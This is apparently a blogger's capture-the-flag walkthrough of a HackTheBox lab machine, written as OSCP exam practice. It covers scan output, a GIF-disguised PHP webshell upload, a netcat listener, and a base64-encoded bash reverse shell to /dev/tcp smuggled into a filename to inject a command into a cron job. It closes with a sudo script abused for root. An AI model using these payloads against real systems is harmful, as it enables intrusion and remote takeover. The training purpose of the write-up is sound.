Follow along in my OSCP journey, this is my target 7 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
| 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https reset ttl 63
There is really only one interesting port here, let’s focus on port 80.
Web server — port 80
We can see in gobuster a couple of interesting URLs
/backup (Status: 301) [Size: 235] /index.php (Status: 200) [Size: 229] /index.php (Status: 200) [Size: 229] /lib.php (Status: 200) [Size: 0] /photos.php (Status: 200) [Size: 1302] /upload.php (Status: 200) [Size: 169] /uploads (Status: 301) [Size: 236]
Let us see what they hold
We have an upload section
A backup of the site
we downloaded the backup and extracted it tar -xvf backup.tar
lib.php
is just a library of functions.photos.php
shows the last 4 uploaded picturesindex.php
returns the normal main pageupload.php
is the main upload page/uploads
is where the pictures are stored
The path is clear we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.
Can you create a webshell that bypasses those restrictions?
HINT
We can see that we need a valid mimetype, stay below 6000Kb and the extension needs to be .jpg, .png, .gif, .jpeg. One of these extensions is just better…
.
.
.
.
Gif baby!
Let’s follow the tutorial and upload the webshell with the correct mime type.
We can see in the photos.php
that whatever we upload the upload looks like this “uploaded_by_<IP>.<extension>
Let’s look for our webshell in /uploads
Let’s capture the request and worked directly inside Burp
Let’s get a reverse shell now!
Don’t forget to start your listener!
nc -nlvp 4444
We are in!
Getting User
Time for some shell upgrade 😉
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let’s do some recon!
We find an odd cron job in Guly’s home directory
HINT
What is the only thing we actually have influence on in this code.
.
.
.
.
$value, we can create files inside of the $path (/var/www/html/uploads)and the code will loop through them! It is then used in this beautiful line.
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
The simple idea is to create a file that executes a command that we want to run and we just play it like we’re doing a command injection bypass.
We try to create a file as a reverse shell but there is one constraint that is stopping us, “/” aren’t allowed in filenames.
HINT
Can you find a beautiful way to create a reverse shell bypassing ‘/’? What is the beloved technique used by powershell to encode its commands?
.
.
.
.
Transform them to BASE64!
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.46/6666 0>&1"' | base64 -w0
Now we just need to create the file and wait ❤
Don’t forget the listener!!!
touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"
We are Guly! Let’s own this server
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The first one is a charm!
What does that file do?
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoFregexp="^[a-zA-Z0-9_\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
It creates a file and then loops through 4 variables and asks the user to provide their value before writing them to the file.
This was a bit of a trial and error trying to understand how we were supposed to exploit this. After trying for a while, I found that adding a space in our input would execute the second part of the variable.
We own this place!
What did I learn?
- We learned how to bypass upload restrictions with the gif extension
- We learned about embedding code into filenames for execution
- We learned how to spot interesting weaknesses in code and abuse them
Stream
Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.